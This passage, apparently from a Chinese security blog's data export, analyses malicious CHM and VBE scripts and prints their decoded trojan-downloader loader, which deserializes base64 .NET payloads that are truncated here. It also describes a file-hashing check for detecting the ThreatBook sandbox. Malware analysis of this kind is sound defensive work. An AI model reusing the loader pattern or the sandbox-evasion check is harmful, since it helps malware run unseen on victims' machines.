class_\">Deserialize</span>_2(ms_2);<br>\t&#125;<span class=\"hljs-keyword\">catch</span> (e2)&#123;&#125;<br>&#125;<br>&#125;)();<br>&lt;/script&gt;<br></code></pre></td></tr></table></figure>\n\n<p>剩下内容与<a href=\"https://blog.lenxy.net/2023/10/30/Analysis-of-vbe-virus/\">VBE样本分析</a>一致了，衍生物也是一样的。只不过白加黑我实在解不明白了，放弃挣扎。</p>\n","site":{"data":{}},"excerpt":"","more":"<h1 id=\"chm样本分析\"><a href=\"#chm样本分析\" class=\"headerlink\" title=\"chm样本分析\"></a>chm样本分析</h1><p>如果说上一篇文章是认真写的，那这一篇百分百属于，，摸鱼的内容了。</p>\n<p>单纯的记录一下chm无文件攻击（吐槽 这样本是无文件转有文件攻击了X）如何分析吧</p>\n<p>由于chm使用了 <a href=\"https://en.wikipedia.org/wiki/LZX\">LZX</a> 进行数据压缩，所以我们可以用7zip来看看里面都有什么（灵车</p>\n<p><img src=\"/./../img/image-20231030174029125.png\"></p>\n<p>里面似乎有个html，打开后发现是js脚本。</p>\n<p><img src=\"/./../img/image-20231030174130475.png\"></p>\n<figure class=\"highlight js\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br><span class=\"line\">28</span><br><span class=\"line\">29</span><br><span class=\"line\">30</span><br><span class=\"line\">31</span><br><span class=\"line\">32</span><br><span class=\"line\">33</span><br><span class=\"line\">34</span><br><span class=\"line\">35</span><br><span class=\"line\">36</span><br><span class=\"line\">37</span><br><span class=\"line\">38</span><br><span class=\"line\">39</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs js\">&lt;script&gt;<br><span class=\"hljs-keyword\">function</span> <span class=\"hljs-title function_\">Base64ToStream</span>(<span class=\"hljs-params\">b,l</span>) &#123;<br>\t<span class=\"hljs-keyword\">var</span> enc = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&quot;System.Text.ASCII&quot;</span>+<span class=\"hljs-string\">&quot;Encoding&quot;</span>);<br>\t<span class=\"hljs-keyword\">var</span> length = enc.<span class=\"hljs-title class_\">GetByteCount</span>_2(b);<br>\t<span class=\"hljs-keyword\">var</span> ba = enc.<span class=\"hljs-title class_\">GetBytes</span>_4(b);<br>\t<span class=\"hljs-keyword\">var</span> transform = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&quot;System.Security.Cryptography.FromBase&quot;</span>+<span class=\"hljs-string\">&quot;64Transform&quot;</span>);<br>\tba = transform.<span class=\"hljs-title class_\">TransformFinalBlock</span>(ba, <span class=\"hljs-number\">0</span>, length);<br>\t<span class=\"hljs-keyword\">var</span> ms = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&quot;System.IO.Memory&quot;</span>+<span class=\"hljs-string\">&quot;Stream&quot;</span>);<br>\tms.<span class=\"hljs-title class_\">Write</span>(ba, <span class=\"hljs-number\">0</span>, l);<br>\tms.<span class=\"hljs-property\">Position</span> = <span class=\"hljs-number\">0</span>;<br>\t<span class=\"hljs-keyword\">return</span> ms;<br>&#125;<br><span class=\"hljs-keyword\">try</span> &#123;<br>\t<span class=\"hljs-keyword\">var</span> shell = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&#x27;WScript.Shell&#x27;</span>);<br>\tver = <span class=\"hljs-string\">&#x27;v4.0.30319&#x27;</span>;<br>\t<br>\t<span class=\"hljs-keyword\">try</span> &#123;<br>\t\t<span class=\"hljs-comment\">//throw 1;</span><br>\t\tshell.<span class=\"hljs-title class_\">RegRead</span>(<span class=\"hljs-string\">&#x27;HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319\\\\&#x27;</span>);<br>\t&#125; <span class=\"hljs-keyword\">catch</span>(e) &#123; <br>\t\tstage_1 = stage_3;<br>\t\tstage_1_len = stage_3_len;<br>\t\tver = <span class=\"hljs-string\">&#x27;v2.0.50727&#x27;</span>;<br>\t&#125;<br>\t<span class=\"hljs-comment\">//shell.Popup(&quot;&quot;, 0, ver, 64);</span><br>\tshell.<span class=\"hljs-title class_\">Environment</span>(<span class=\"hljs-string\">&#x27;Process&#x27;</span>)(<span class=\"hljs-string\">&#x27;COMPLUS_Version&#x27;</span>) = ver;<br><br>\t<span class=\"hljs-keyword\">var</span> ms_1 = <span class=\"hljs-title class_\">Base64ToStream</span>(stage_1, stage_1_len);<br>\t<span class=\"hljs-keyword\">var</span> fmt_1 = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&#x27;System.Runtime.Serialization.Formatters.Bi&#x27;</span>+<span class=\"hljs-string\">&#x27;nary.BinaryFormatter&#x27;</span>);<br>\tfmt_1.<span class=\"hljs-title class_\">Deserialize</span>_2(ms_1);<br>&#125; <span class=\"hljs-keyword\">catch</span> (e) &#123;<br>\t<span class=\"hljs-keyword\">try</span>&#123;\t\t<br>\t\t<span class=\"hljs-keyword\">var</span> ms_2 = <span class=\"hljs-title class_\">Base64ToStream</span>(stage_2, stage_2_len);<br>\t\t<span class=\"hljs-keyword\">var</span> fmt_2 = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&#x27;System.Runtime.Serialization.Formatters.Bi&#x27;</span>+<span class=\"hljs-string\">&#x27;nary.BinaryFormatter&#x27;</span>);<br>\t\tfmt_2.<span class=\"hljs-title class_\">Deserialize</span>_2(ms_2);<br>\t&#125;<span class=\"hljs-keyword\">catch</span> (e2)&#123;&#125;<br>&#125;<br>&#125;)();<br>&lt;/script&gt;<br></code></pre></td></tr></table></figure>\n\n<p>剩下内容与<a href=\"https://blog.lenxy.net/2023/10/30/Analysis-of-vbe-virus/\">VBE样本分析</a>一致了，衍生物也是一样的。只不过白加黑我实在解不明白了，放弃挣扎。</p>\n"},{"title":"VBE样本分析","date":"2023-10-30T07:13:58.000Z","_content":"\n# VBE样本分析\n\n逛论坛的时候发现了许多VBE的样本，闲来无事就拿过来一个进行痛苦的分析）\n\n## 样本解密\n\n![](./../img/image-20231030151742300.png)\n\n由于使用的是VBE加密，所以需要用到[srcdec](https://gist.github.com/bcse/1834878)来进行解密嘞（感谢DI的赞助，所以不得不把分析环境切到虚拟机里）\n\n\n\n![](./../img/image-20231030152255685.png)\n\n吐槽下，由于编码问题需要指定codepage来进行解密。否则会出现乱码的情况\n\n## 脚本结构\n\n解密完成后大概可以看到脚本结构了\n\n```vb\nstage_1 = \"AAEAAAD/////.....\"\nstage_1_len = 2341\nstage_2 = \"AAEAAAD/////.....\"\nstage_2_len = 198280\nstage_3 = \"AAEAAAD/////.....\"\nstage_3_len = 197922\nFunction Base64ToStream(b,l)\n  Dim enc, length, transform, ms\n  Set enc = CreateObject(\"System.Text.ASCII\"+\"Encoding\")\n  length = enc.GetByteCount_2(b)\n  Set transform = CreateObject(\"System.Security.Cryptography.FromBase64Transform\")\n  Set ms = CreateObject(\"System.IO.MemoryStream\")\n  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, l\n  ms.Position = 0\n  Set Base64ToStream = ms\nEnd Function\nDim shell\nSet shell = CreateObject(\"WScript.Shell\")\nDim ver\nver = \"v4.0.30319\"\nOn Error Resume Next\nshell.RegRead \"HKLM\\SOFTWARE\\\\Microsoft\\.NETFramework\\v4.0.30319\\\"\nIf Err.Number <> 0 Then\n  ver = \"v2.0.50727\"\n  stage_1 = stage_3\n  stage_1_len = stage_3_len\n  Err.Clear\nEnd If\nshell.Environment(\"Process\").Item(\"COMPLUS_Version\") = ver\n'shell.Popup \"\", 0, ver, 64\nOn Error Resume Next\nDim fmt_1\nSet fmt_1 = CreateObject(\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\")\nfmt_1.Deserialize_2(Base64ToStream(stage_1, stage_1_len))\nIf Err.Number <> 0 Then\n  Dim fmt_2\n  Set fmt_2 = CreateObject(\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\")\n  fmt_2.Deserialize_2(Base64ToStream(stage_2, stage_2_len))\nEnd If\n```\n\n看文件格式大概率是[GadgetToJScript](https://github.com/med0x2e/GadgetToJScript/tree/2.0)的杰作了，那这样子逆向起来应该不会很麻烦。\n\nstage_1/2/3是base64加密的，丢010editor里解密一下就能扒出来点东西。转HEX后记得把MZ前的垃圾删掉\n\n\n\n![](./../img/image-20231030163019691.png)\n\n随后就可以丢进去看一眼文件头了）  很好C#写的 剩下的就交给dnSpy来解决了\n\n![](./../img/image-20231030163134325.png)\n\n\n\n![](./../img/image-20231030163704488.png)\n\n所以这个脚本就是一个Trojan-Downloader( 后续行为还是得看那几个衍生物的\n\n很有趣的事情是，他针对两个.net版本用了不同的payload。有空分析下这两个有什么区别吧）\n\n## 后续\n\n衍生物什么的挖个坑，日后再填吧。准备先把G2JS的内容写了。玩无文件攻击貌似会很有趣）\n","source":"_posts/Analysis-of-vbe-virus.md","raw":"---\ntitle: VBE样本分析\ndate: 2023-10-30 15:13:58\ntags: 病毒分析\n---\n\n# VBE样本分析\n\n逛论坛的时候发现了许多VBE的样本，闲来无事就拿过来一个进行痛苦的分析）\n\n## 样本解密\n\n![](./../img/image-20231030151742300.png)\n\n由于使用的是VBE加密，所以需要用到[srcdec](https://gist.github.com/bcse/1834878)来进行解密嘞（感谢DI的赞助，所以不得不把分析环境切到虚拟机里）\n\n\n\n![](./../img/image-20231030152255685.png)\n\n吐槽下，由于编码问题需要指定codepage来进行解密。否则会出现乱码的情况\n\n## 脚本结构\n\n解密完成后大概可以看到脚本结构了\n\n```vb\nstage_1 = \"AAEAAAD/////.....\"\nstage_1_len = 2341\nstage_2 = \"AAEAAAD/////.....\"\nstage_2_len = 198280\nstage_3 = \"AAEAAAD/////.....\"\nstage_3_len = 197922\nFunction Base64ToStream(b,l)\n  Dim enc, length, transform, ms\n  Set enc = CreateObject(\"System.Text.ASCII\"+\"Encoding\")\n  length = enc.GetByteCount_2(b)\n  Set transform = CreateObject(\"System.Security.Cryptography.FromBase64Transform\")\n  Set ms = CreateObject(\"System.IO.MemoryStream\")\n  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, l\n  ms.Position = 0\n  Set Base64ToStream = ms\nEnd Function\nDim shell\nSet shell = CreateObject(\"WScript.Shell\")\nDim ver\nver = \"v4.0.30319\"\nOn Error Resume Next\nshell.RegRead \"HKLM\\SOFTWARE\\\\Microsoft\\.NETFramework\\v4.0.30319\\\"\nIf Err.Number <> 0 Then\n  ver = \"v2.0.50727\"\n  stage_1 = stage_3\n  stage_1_len = stage_3_len\n  Err.Clear\nEnd If\nshell.Environment(\"Process\").Item(\"COMPLUS_Version\") = ver\n'shell.Popup \"\", 0, ver, 64\nOn Error Resume Next\nDim fmt_1\nSet fmt_1 = CreateObject(\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\")\nfmt_1.Deserialize_2(Base64ToStream(stage_1, stage_1_len))\nIf Err.Number <> 0 Then\n  Dim fmt_2\n  Set fmt_2 = CreateObject(\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\")\n  fmt_2.Deserialize_2(Base64ToStream(stage_2, stage_2_len))\nEnd If\n```\n\n看文件格式大概率是[GadgetToJScript](https://github.com/med0x2e/GadgetToJScript/tree/2.0)的杰作了，那这样子逆向起来应该不会很麻烦。\n\nstage_1/2/3是base64加密的，丢010editor里解密一下就能扒出来点东西。转HEX后记得把MZ前的垃圾删掉\n\n\n\n![](./../img/image-20231030163019691.png)\n\n随后就可以丢进去看一眼文件头了）  很好C#写的 剩下的就交给dnSpy来解决了\n\n![](./../img/image-20231030163134325.png)\n\n\n\n![](./../img/image-20231030163704488.png)\n\n所以这个脚本就是一个Trojan-Downloader( 后续行为还是得看那几个衍生物的\n\n很有趣的事情是，他针对两个.net版本用了不同的payload。有空分析下这两个有什么区别吧）\n\n## 后续\n\n衍生物什么的挖个坑，日后再填吧。准备先把G2JS的内容写了。玩无文件攻击貌似会很有趣）\n","slug":"Analysis-of-vbe-virus","published":1,"updated":"2025-02-12T15:31:51.312Z","comments":1,"layout":"post","photos":[],"link":"","_id":"cm722r5bl00027dp8512q188k","content":"<h1 id=\"VBE样本分析\"><a href=\"#VBE样本分析\" class=\"headerlink\" title=\"VBE样本分析\"></a>VBE样本分析</h1><p>逛论坛的时候发现了许多VBE的样本，闲来无事就拿过来一个进行痛苦的分析）</p>\n<h2 id=\"样本解密\"><a href=\"#样本解密\" class=\"headerlink\" title=\"样本解密\"></a>样本解密</h2><p><img src=\"/./../img/image-20231030151742300.png\"></p>\n<p>由于使用的是VBE加密，所以需要用到<a href=\"https://gist.github.com/bcse/1834878\">srcdec</a>来进行解密嘞（感谢DI的赞助，所以不得不把分析环境切到虚拟机里）</p>\n<p><img src=\"/./../img/image-20231030152255685.png\"></p>\n<p>吐槽下，由于编码问题需要指定codepage来进行解密。否则会出现乱码的情况</p>\n<h2 id=\"脚本结构\"><a href=\"#脚本结构\" class=\"headerlink\" title=\"脚本结构\"></a>脚本结构</h2><p>解密完成后大概可以看到脚本结构了</p>\n<figure class=\"highlight vb\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br><span class=\"line\">28</span><br><span class=\"line\">29</span><br><span class=\"line\">30</span><br><span class=\"line\">31</span><br><span class=\"line\">32</span><br><span class=\"line\">33</span><br><span class=\"line\">34</span><br><span class=\"line\">35</span><br><span class=\"line\">36</span><br><span class=\"line\">37</span><br><span class=\"line\">38</span><br><span class=\"line\">39</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs vb\">stage_1 = <span class=\"hljs-string\">&quot;AAEAAAD/////.....&quot;</span><br>stage_1_len = <span class=\"hljs-number\">2341</span><br>stage_2 = <span class=\"hljs-string\">&quot;AAEAAAD/////.....&quot;</span><br>stage_2_len = <span class=\"hljs-number\">198280</span><br>stage_3 = <span class=\"hljs-string\">&quot;AAEAAAD/////.....&quot;</span><br>stage_3_len = <span class=\"hljs-number\">197922</span><br><span class=\"hljs-keyword\">Function</span> Base64ToStream(b,l)<br>  <span class=\"hljs-keyword\">Dim</span> enc, length, transform, ms<br>  <span class=\"hljs-keyword\">Set</span> enc = CreateObject(<span class=\"hljs-string\">&quot;System.Text.ASCII&quot;</span>+<span class=\"hljs-string\">&quot;Encoding&quot;</span>)<br>  length = enc.GetByteCount_2(b)<br>  <span class=\"hljs-keyword\">Set</span> transform = CreateObject(<span class=\"hljs-string\">&quot;System.Security.Cryptography.FromBase64Transform&quot;</span>)<br>  <span class=\"hljs-keyword\">Set</span> ms = CreateObject(<span class=\"hljs-string\">&quot;System.IO.MemoryStream&quot;</span>)<br>  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), <span class=\"hljs-number\">0</span>, length), <span class=\"hljs-number\">0</span>, l<br>  ms.Position = <span class=\"hljs-number\">0</span><br>  <span class=\"hljs-keyword\">Set</span> Base64ToStream = ms<br><span class=\"hljs-keyword\">End</span> <span class=\"hljs-keyword\">Function</span><br><span class=\"hljs-keyword\">Dim</span> shell<br><span class=\"hljs-keyword\">Set</span> shell = CreateObject(<span class=\"hljs-string\">&quot;WScript.Shell&quot;</span>)<br><span class=\"hljs-keyword\">Dim</span> ver<br>ver = <span class=\"hljs-string\">&quot;v4.0.30319&quot;</span><br><span class=\"hljs-keyword\">On</span> <span class=\"hljs-keyword\">Error</span> <span class=\"hljs-keyword\">Resume</span> <span class=\"hljs-keyword\">Next</span><br>shell.RegRead <span class=\"hljs-string\">&quot;HKLM\\SOFTWARE\\\\Microsoft\\.NETFramework\\v4.0.30319\\&quot;</span><br><span class=\"hljs-keyword\">If</span> Err.Number &lt;&gt; <span class=\"hljs-number\">0</span> <span class=\"hljs-keyword\">Then</span><br>  ver = <span class=\"hljs-string\">&quot;v2.0.50727&quot;</span><br>  stage_1 = stage_3<br>  stage_1_len = stage_3_len<br>  Err.Clear<br><span class=\"hljs-keyword\">End</span> <span class=\"hljs-keyword\">If</span><br>shell.Environment(<span class=\"hljs-string\">&quot;Process&quot;</span>).Item(<span class=\"hljs-string\">&quot;COMPLUS_Version&quot;</span>) = ver<br><span class=\"hljs-comment\">&#x27;shell.Popup &quot;&quot;, 0, ver, 64</span><br><span class=\"hljs-keyword\">On</span> <span class=\"hljs-keyword\">Error</span> <span class=\"hljs-keyword\">Resume</span> <span class=\"hljs-keyword\">Next</span><br><span class=\"hljs-keyword\">Dim</span> fmt_1<br><span class=\"hljs-keyword\">Set</span> fmt_1 = CreateObject(<span class=\"hljs-string\">&quot;System.Runtime.Serialization.Formatters.Binary.BinaryFormatter&quot;</span>)<br>fmt_1.Deserialize_2(Base64ToStream(stage_1, stage_1_len))<br><span class=\"hljs-keyword\">If</span> Err.Number &lt;&gt; <span class=\"hljs-number\">0</span> <span class=\"hljs-keyword\">Then</span><br>  <span class=\"hljs-keyword\">Dim</span> fmt_2<br>  <span class=\"hljs-keyword\">Set</span> fmt_2 = CreateObject(<span class=\"hljs-string\">&quot;System.Runtime.Serialization.Formatters.Binary.BinaryFormatter&quot;</span>)<br>  fmt_2.Deserialize_2(Base64ToStream(stage_2, stage_2_len))<br><span class=\"hljs-keyword\">End</span> <span class=\"hljs-keyword\">If</span><br></code></pre></td></tr></table></figure>\n\n<p>看文件格式大概率是<a href=\"https://github.com/med0x2e/GadgetToJScript/tree/2.0\">GadgetToJScript</a>的杰作了，那这样子逆向起来应该不会很麻烦。</p>\n<p>stage_1&#x2F;2&#x2F;3是base64加密的，丢010editor里解密一下就能扒出来点东西。转HEX后记得把MZ前的垃圾删掉</p>\n<p><img src=\"/./../img/image-20231030163019691.png\"></p>\n<p>随后就可以丢进去看一眼文件头了）  很好C#写的 剩下的就交给dnSpy来解决了</p>\n<p><img src=\"/./../img/image-20231030163134325.png\"></p>\n<p><img src=\"/./../img/image-20231030163704488.png\"></p>\n<p>所以这个脚本就是一个Trojan-Downloader( 后续行为还是得看那几个衍生物的</p>\n<p>很有趣的事情是，他针对两个.net版本用了不同的payload。有空分析下这两个有什么区别吧）</p>\n<h2 id=\"后续\"><a href=\"#后续\" class=\"headerlink\" title=\"后续\"></a>后续</h2><p>衍生物什么的挖个坑，日后再填吧。准备先把G2JS的内容写了。玩无文件攻击貌似会很有趣）</p>\n","site":{"data":{}},"excerpt":"","more":"<h1 id=\"VBE样本分析\"><a href=\"#VBE样本分析\" class=\"headerlink\" title=\"VBE样本分析\"></a>VBE样本分析</h1><p>逛论坛的时候发现了许多VBE的样本，闲来无事就拿过来一个进行痛苦的分析）</p>\n<h2 id=\"样本解密\"><a href=\"#样本解密\" class=\"headerlink\" title=\"样本解密\"></a>样本解密</h2><p><img src=\"/./../img/image-20231030151742300.png\"></p>\n<p>由于使用的是VBE加密，所以需要用到<a href=\"https://gist.github.com/bcse/1834878\">srcdec</a>来进行解密嘞（感谢DI的赞助，所以不得不把分析环境切到虚拟机里）</p>\n<p><img src=\"/./../img/image-20231030152255685.png\"></p>\n<p>吐槽下，由于编码问题需要指定codepage来进行解密。否则会出现乱码的情况</p>\n<h2 id=\"脚本结构\"><a href=\"#脚本结构\" class=\"headerlink\" title=\"脚本结构\"></a>脚本结构</h2><p>解密完成后大概可以看到脚本结构了</p>\n<figure class=\"highlight vb\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br><span class=\"line\">28</span><br><span class=\"line\">29</span><br><span class=\"line\">30</span><br><span class=\"line\">31</span><br><span class=\"line\">32</span><br><span class=\"line\">33</span><br><span class=\"line\">34</span><br><span class=\"line\">35</span><br><span class=\"line\">36</span><br><span class=\"line\">37</span><br><span class=\"line\">38</span><br><span class=\"line\">39</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs vb\">stage_1 = <span class=\"hljs-string\">&quot;AAEAAAD/////.....&quot;</span><br>stage_1_len = <span class=\"hljs-number\">2341</span><br>stage_2 = <span class=\"hljs-string\">&quot;AAEAAAD/////.....&quot;</span><br>stage_2_len = <span class=\"hljs-number\">198280</span><br>stage_3 = <span class=\"hljs-string\">&quot;AAEAAAD/////.....&quot;</span><br>stage_3_len = <span class=\"hljs-number\">197922</span><br><span class=\"hljs-keyword\">Function</span> Base64ToStream(b,l)<br>  <span class=\"hljs-keyword\">Dim</span> enc, length, transform, ms<br>  <span class=\"hljs-keyword\">Set</span> enc = CreateObject(<span class=\"hljs-string\">&quot;System.Text.ASCII&quot;</span>+<span class=\"hljs-string\">&quot;Encoding&quot;</span>)<br>  length = enc.GetByteCount_2(b)<br>  <span class=\"hljs-keyword\">Set</span> transform = CreateObject(<span class=\"hljs-string\">&quot;System.Security.Cryptography.FromBase64Transform&quot;</span>)<br>  <span class=\"hljs-keyword\">Set</span> ms = CreateObject(<span class=\"hljs-string\">&quot;System.IO.MemoryStream&quot;</span>)<br>  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), <span class=\"hljs-number\">0</span>, length), <span class=\"hljs-number\">0</span>, l<br>  ms.Position = <span class=\"hljs-number\">0</span><br>  <span class=\"hljs-keyword\">Set</span> Base64ToStream = ms<br><span class=\"hljs-keyword\">End</span> <span class=\"hljs-keyword\">Function</span><br><span class=\"hljs-keyword\">Dim</span> shell<br><span class=\"hljs-keyword\">Set</span> shell = CreateObject(<span class=\"hljs-string\">&quot;WScript.Shell&quot;</span>)<br><span class=\"hljs-keyword\">Dim</span> ver<br>ver = <span class=\"hljs-string\">&quot;v4.0.30319&quot;</span><br><span class=\"hljs-keyword\">On</span> <span class=\"hljs-keyword\">Error</span> <span class=\"hljs-keyword\">Resume</span> <span class=\"hljs-keyword\">Next</span><br>shell.RegRead <span class=\"hljs-string\">&quot;HKLM\\SOFTWARE\\\\Microsoft\\.NETFramework\\v4.0.30319\\&quot;</span><br><span class=\"hljs-keyword\">If</span> Err.Number &lt;&gt; <span class=\"hljs-number\">0</span> <span class=\"hljs-keyword\">Then</span><br>  ver = <span class=\"hljs-string\">&quot;v2.0.50727&quot;</span><br>  stage_1 = stage_3<br>  stage_1_len = stage_3_len<br>  Err.Clear<br><span class=\"hljs-keyword\">End</span> <span class=\"hljs-keyword\">If</span><br>shell.Environment(<span class=\"hljs-string\">&quot;Process&quot;</span>).Item(<span class=\"hljs-string\">&quot;COMPLUS_Version&quot;</span>) = ver<br><span class=\"hljs-comment\">&#x27;shell.Popup &quot;&quot;, 0, ver, 64</span><br><span class=\"hljs-keyword\">On</span> <span class=\"hljs-keyword\">Error</span> <span class=\"hljs-keyword\">Resume</span> <span class=\"hljs-keyword\">Next</span><br><span class=\"hljs-keyword\">Dim</span> fmt_1<br><span class=\"hljs-keyword\">Set</span> fmt_1 = CreateObject(<span class=\"hljs-string\">&quot;System.Runtime.Serialization.Formatters.Binary.BinaryFormatter&quot;</span>)<br>fmt_1.Deserialize_2(Base64ToStream(stage_1, stage_1_len))<br><span class=\"hljs-keyword\">If</span> Err.Number &lt;&gt; <span class=\"hljs-number\">0</span> <span class=\"hljs-keyword\">Then</span><br>  <span class=\"hljs-keyword\">Dim</span> fmt_2<br>  <span class=\"hljs-keyword\">Set</span> fmt_2 = CreateObject(<span class=\"hljs-string\">&quot;System.Runtime.Serialization.Formatters.Binary.BinaryFormatter&quot;</span>)<br>  fmt_2.Deserialize_2(Base64ToStream(stage_2, stage_2_len))<br><span class=\"hljs-keyword\">End</span> <span class=\"hljs-keyword\">If</span><br></code></pre></td></tr></table></figure>\n\n<p>看文件格式大概率是<a href=\"https://github.com/med0x2e/GadgetToJScript/tree/2.0\">GadgetToJScript</a>的杰作了，那这样子逆向起来应该不会很麻烦。</p>\n<p>stage_1&#x2F;2&#x2F;3是base64加密的，丢010editor里解密一下就能扒出来点东西。转HEX后记得把MZ前的垃圾删掉</p>\n<p><img src=\"/./../img/image-20231030163019691.png\"></p>\n<p>随后就可以丢进去看一眼文件头了）  很好C#写的 剩下的就交给dnSpy来解决了</p>\n<p><img src=\"/./../img/image-20231030163134325.png\"></p>\n<p><img src=\"/./../img/image-20231030163704488.png\"></p>\n<p>所以这个脚本就是一个Trojan-Downloader( 后续行为还是得看那几个衍生物的</p>\n<p>很有趣的事情是，他针对两个.net版本用了不同的payload。有空分析下这两个有什么区别吧）</p>\n<h2 id=\"后续\"><a href=\"#后续\" class=\"headerlink\" title=\"后续\"></a>后续</h2><p>衍生物什么的挖个坑，日后再填吧。准备先把G2JS的内容写了。玩无文件攻击貌似会很有趣）</p>\n"},{"title":"TBSandbox-Day1","date":"2024-04-04T13:02:38.000Z","_content":"\n# 微步沙箱分析-Day1\n\n> 算是一篇简单的水文,主要是吐槽以前有人提出的 微步沙箱里面有CrowdStrike.  也不知道从哪看来的文章就开始信口开河.\n\n![](../img/TBSandbox-Day1/image-20240404214152937.png)\n\n纪念某泄露版CS\n\n##  正文部分\n\n在查看进程中,总是能发现微步把奇奇怪怪的.exe塞到 `C:\\Program Files\\`和`C:\\Program Files (x86)\\`中\n\n![](../img/TBSandbox-Day1/image-20240404214212657.png)\n\n以上进程甚至有Viper和微点(微点都死多少年了还能被拉出来鞭尸)\n\n可以基本判断微步的沙箱会在两个程序目录放一堆假的exe用于进程欺诈.而且文件大小一致,开始令人怀疑是不是同一个文件了.于是糊了一个程序来测试\n\n```rust\nuse std::fs::File;\nuse std::io::{BufReader, Read};\nuse std::path::Path;\nuse sha2::{Digest, Sha256};\nuse walkdir::WalkDir;\nuse std::process::Command;\nfn calculate_sha256(file_path: &Path) -> String {\n    let file = File::open(file_path).expect(\"Failed to open file\");\n    let mut reader = BufReader::new(file);\n    let mut hasher = Sha256::new();\n\n    let mut buffer = [0; 1024];\n    loop {\n        let count = reader.read(&mut buffer).expect(\"Failed to read file\");\n        if count == 0 {\n            break;\n        }\n        hasher.update(&buffer[..count]);\n    }\n\n    let hash = hasher.finalize();\n    let hash_string: String = hash.iter().map(|byte| format!(\"{:02x}\", byte)).collect();\n    hash_string\n}\n\nfn main() {\n    let dir_path = \"C:\\\\Program Files\\\\\";\n    let walker = WalkDir::new(dir_path).min_depth(1).max_depth(1).into_iter();\n\n    for entry in walker.filter_map(|e| e.ok()) {\n        if entry.file_type().is_file() {\n            let file_path = entry.path();\n            let hash = calculate_sha256(file_path);\n            println!(\"{}: {}\", file_path.display(), hash);\n        }\n    }\n    let _ = Command::new(\"cmd.exe\").arg(\"/c\").arg(\"pause\").status();\n}\n\n```\n\n![](../img/TBSandbox-Day1/image-20240404214236898.png)\n\n不得不承认,微步还是挺灵的.这回又给你塞了点安全狗 \n\n![](../img/TBSandbox-Day1/image-20240404214250316.png)\n\n所以绕过微步的灵车技巧可能就是通过判断哈希是否相同来搞了\n","source":"_posts/TBSandbox-Day1.md","raw":"---\ntitle: TBSandbox-Day1\ndate: 2024-04-04 21:02:38\ntags: 沙箱分析\n---\n\n# 微步沙箱分析-Day1\n\n> 算是一篇简单的水文,主要是吐槽以前有人提出的 微步沙箱里面有CrowdStrike.  也不知道从哪看来的文章就开始信口开河.\n\n![](../img/TBSandbox-Day1/image-20240404214152937.png)\n\n纪念某泄露版CS\n\n##  正文部分\n\n在查看进程中,总是能发现微步把奇奇怪怪的.exe塞到 `C:\\Program Files\\`和`C:\\Program Files 